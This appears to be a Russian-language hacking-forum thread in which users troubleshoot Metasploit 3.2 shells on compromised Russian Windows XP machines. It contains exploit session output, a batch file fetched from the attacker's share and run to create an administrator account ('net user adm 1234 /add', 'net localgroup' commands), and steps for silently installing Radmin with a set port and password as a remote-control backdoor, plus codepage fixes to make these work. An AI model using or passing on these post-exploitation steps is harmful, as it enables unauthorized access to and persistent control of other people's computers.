[*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 3 - lang:Russian [*] Selected Target: Windows XP SP3 Russian (NX) [*] Triggering the vulnerability... [*] Command shell session 8 opened (10.1.0.91:35136 -> 10.1.0.38:4444) Microsoft Windows XP [¥àá¨ï 5.1.2600] () ®à¯®à æ¨ï ©ªà®á®äâ, 1985-2001. C:\WINDOWS\system32> >> copy \\10.1.0.91\1\1.bat c:\ copy \\10.1.0.91\1\1.bat c:\ ¥ ©¤¥ á¥â¥¢®© ¯ãâì. ___________________________________________________________________________ chcp1251 не работает в общем как с этим боротсья подскажите плиз изза этого я думаю, не создается учетка в группе Администраторы, иочнее учетка создается но не присоедитняется к группе еще если кто может то подскажите как на удаленной машине скачивать файлы по сети(фтп просьба не предлагать) меня интересует синтаксис copy и xcopy еще интересно как подключить сетевой диск на удаленной машине чтобы я копировал как с локального диска вроде пока вопросов больше нет если кто подскажет буду крайне благодарен, любой информации, а пока пойду гуглить пс. находил все необходимые команды, но они потерялись, помню что они короткие (не более 10 символов на расшаривание диска с) причем оно реально работало, или подскажите как и где посмотреть логи MSF 3.2 запущенном на ubuntu.
Code: C:\Users\Администратор>xcopy /? Копирование файлов и структур каталогов. Примечание: XCOPY считается устаревшей командой, вместо нее рекомендуется использовать ROBOCOPY. XCOPY источник [результат] [/A | /M] [/D[:дата]] [/P] [/S [/E]] [/V] [/W] [/C] [/I] [/Q] [/F] [/L] [/G] [/H] [/R] [/T] [/U] [/K] [/N] [/O] [/X] [/Y] [/-Y] [/Z] [/B] [/EXCLUDE:файл1[+файл2][+файл3]...] источник Копируемые файлы. результат Местоположение и/или имена новых файлов. /A Копирование только файлов с установленным архивным атрибутом. Сам атрибут при этом не изменяется. /M Копирование только файлов с установленным архивным атрибутом. После копирования атрибут снимается. /D:дата Копирование файлов, измененных не ранее указанной даты. Если дата не указана, заменяются только конечные файлы, более старые, чем исходные. /EXCLUDE:файл1[+файл2][+файл3]... Список файлов, содержащих строки. Каждая текстовая строка должна располагаться в отдельной строке файла. Когда любая из строк совпадает с любой частью абсолютного пути к копируемому файлу, такой файл исключается из операции копирования. К примеру, указав строку \obj\ или .obj можно исключить все файлы из папки obj или все файлы с расширением obj соответственно. /P Вывод запросов перед созданием каждого нового файла. /S Копирование каталогов с подкаталогами (кроме пустых). /E Копирование каталогов с подкаталогами (в том числе пустых). Эквивалентен сочетанию ключей /S /E. Совместим с ключом /T. /V Сравнение конечных файлов с исходными. /W Вывод запроса на нажатие клавиши перед копированием. /C Продолжение копирования, независимо от наличия ошибок. /I Если результат не существует, а копируется несколько файлов, считается, что указано имя каталога. /Q Запрет вывода имен копируемых файлов. /F Вывод полных имен исходных и конечных файлов. /L Вывод имен копируемых файлов. /G Копирование зашифрованных файлов в каталог результата, не поддерживающий шифрование. /H Копирование скрытых и системных файлов (среди прочих). /R Разрешение замены файлов, предназначенных только для чтения. /T Создание структуры каталогов (кроме пустых каталогов) без копирования файлов. Если требуется создать пустые каталоги и подкаталоги, используйте сочетание ключей /T /E. /U Копирование только файлов, уже имеющихся в конечном каталоге. /K Копирование атрибута "Только чтение" (обычно он сбрасывается). /N Использование коротких имен при копировании. /O Копирование сведений о владельце и данных ACL. /X Копирование параметров аудита файлов (требует /O). /Y Подавление запроса подтверждения на перезапись существующего конечного файла. /-Y Обязательный запрос подтверждения на перезапись существующего конечного файла. /Z Копирование сетевых файлов с возобновлением. /B Копирование самой символической ссылки вместо копирования целевого объекта этой ссылки Ключ /Y можно установить через переменную среды COPYCMD. Ключ /-Y командной строки переопределяет такую установку. А ты у верен, что у жертвы стоит CP1251? Попробуй запустить без параметров chcp Сетевой диск монтируется коммандой subst Code: C:\Users\Администратор>subst /? Сопоставление имени диска указанному пути. SUBST [диск1: [диск2:]путь] SUBST диск1: /D диск1: Виртуальный диск, который сопоставляется указанному пути. [диск:]путь Физические диск и путь, которым сопоставляется виртуальный диск. /D Удаление ранее созданного виртуального диска. Введите SUBST без параметров для вывода текущего списка виртуальных дисков.
что именно запустить и как я юзаю ./msfweb opera--http://127.0.0.1:55555/ ___________________________________________-- вот что попробовал сделать [*] Command shell session 10 opened (10.1.0.91:56278 -> 10.1.0.38:4444) Microsoft Windows XP [‚¥àá¨ï 5.1.2600] (‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001. C:\WINDOWS\system32> >> chcp chcp ’¥ªãé ï ª®¤®¢ ï áâà ¨æ : 866 чте сделать дальше?? попробовал запустить батник с содержанием net user adm 1234 /add net localgroup Администраторы adm /add и получил >> 1.bat 1.bat C:\>net user adm 1234 /add Š®¬ ¤ ¢ë¯®«¥ ãᯥè®. C:\>net localgroup Ð�дминиÑ�Ñ‚Ñ?атоÑ?Ñ‹ adm /add ‘¨á⥬ ï ®è¨¡ª 1376. “ª § ï «®ª «ì ï £à㯯 ¥ áãé¥áâ¢ã¥â. ___________ запустил тотже батник на локальном компе и посмотрел что он мне ответит, ответ получил тот о котором и подозревал- "указанная локальная группа не существует " ввел net localgroup Администраторы adm /add в цмд и получил ответ "Команда успешно выполнена" вопрос о кодировке остается открытым
Текущая кодовая страница 866 (Dos), выполни в шеле chcp 1251 P.S. Декодировал штирлицом кракозябры получилось: dos->iso Win -> DOS (2064)
запустил в шеле (мсф консоле) >> chcp 1251 chcp 1251 ¥ªãé ï ª®¤®¢ ï áâà ¨æ : 1251 C:\> >> 1.bat 1.bat C:\>net user adm 1234 /add ®¬ ¤ ¢ë¯®«¥ ãᯥè®. C:\>net localgroup ÐдминиÑÑÑаÑоÑÑ adm /add ¨á⥬ ï ®è¨¡ª 1376. ª § ï «®ª «ì ï £à㯯 ¥ áãé¥áâ¢ã¥â.
в общем все завелось)) надо было немного голову включить)) шаг1 в щеле chcp 1251 в gedit сохранил батник с кодировкой windows-1251 ответ в щеле пришол кривой но команда отработала успешно))
Теперь показывает WIN->DOS (3) Где-то идёт перекодирование... Первая комманда выполнена успешно. Вторая комманда: Указанная локальная группа не существует.
ок тогда как сделать так чтобы я видел русские буквы ?? какая у меня кодировка в ubuntu 8.04 hardy ? и я так понял надо в шеле выставить туже и еще такой вопрос о радмине2.2 в шеле 1 скопировал в систем32 raddrv.dll и r_server.exe 2 r_server /install /port:4899 /pass:1234567890 /save 3 r_server /start но чото както не рабоатет запускаю радмин под вайном(на вайн не грешу ибо на тачки куда ставился радмин локально конектится нормально xD) вот как бы я не игрался с /port радмин как висел на 4899 так и висит, в тасклист только после каждой операции с рсервером появляется новый процесс но нмап все равно говорит о открытом 4899 порте где накосорезил ?? ах да забыл сказать что когда пытаюсь подключиться к серверу то пишет чтото про фильтрацию, но когда пытаюсь подключиться на другой порт то тупо"нельзя подключиться" такую ситуацию я наблюдал когда пытался подключиться к машине с ненастроеным радмином(например сборка zver), то есть он какбы установлен и даже запущен но пока я его ручкеами не настрою( через его же графическую оболочку конфига) он работать отказывался и выдавал ту же самую ошибку пс: на радмине не настаиваю но нужна прога для удаленного управления и чтобы устанавливалась с команднйо строки это последний вопрос в данной теме
в общем проблема было в том что на компах почемуто не работала настройка радмина из командной строки(( проблема решилась таким образом на локальном компе r_server.exe /setup вбил ручками порт и пароль ребут экспортирвал ветку реестра в которой лежали все настройки радмина удалил эту ветку r_server.exe /stop убил процес r_server.exe удалил радмина со всеми осчтавшимися потрохами ребут скопировал радмина заново в папку систем32 скопировал туда рег фаил запустил рег фаил РЕБУТНУЛ КОМПЬЮТЕР после ребута в реестре появилась ветка со всеми настройками радмина подключился радминеом))) был счастлив всем спс кто пмомг тему можно закрывать xD
Угу, но и subst прокатывает, комманда ищё времён dos, на XP сопоставляет имя диска указанному пути (в том числе и сетевому). Code: subst Диск: \\ip_компа\Расшаренная_папка
Всё таки кто нибудь знает как поменять кодировку в Metasploit 3.2 чтоб в русской винде нормально отображались киррилические имена файлов и папок? У меня он похоже вообще киррилицу не поддерживает (хотя помниться 2 версия метасплойта норм кириллицу отображал), при выводе отображает крякозябры, при вводе данных сессия виснет.
Господа, не могли бы объяснить новичку, как этим пользоваться? http://takeworld.blogspot.com/2008/11/metasploit-framework-2.html И поможет ли это?
Неплохо было бы поюзать поиск: http://forum.antichat.ru/threadnav89007-8-10.html З.Ы. Вопрос из этойже оперы, кодировка нормально работает, но вот meterpreter сёравно не обучен кодировке. и при копировании в именах файлов места руских букв вопросы, приходица архивировать раром и потом заливать себе архив, что не есть эстетично ) нада гдето еще править. знающие люди подскажите хотяб в каком файле это фиксить. Лебедь ты полюбому в курсе откликнись )) шоб этот вопрос для начинающих решили раз и навсегда
ну народ , не совсем удобно добавлять пользователей бат файлами ))) их же еще закинуть на удаленный хост надо, особых траблов с этим нет но всеже не удобно. net user add xaker xD работает нормально а вот группа Administrators на рус виндах называется Администраторы и с добавлением пользователя 'хацкер' возникают проблемы (( того кому надо распотрошить комп это не проблема, но мелкие неудобства всеже доставляет
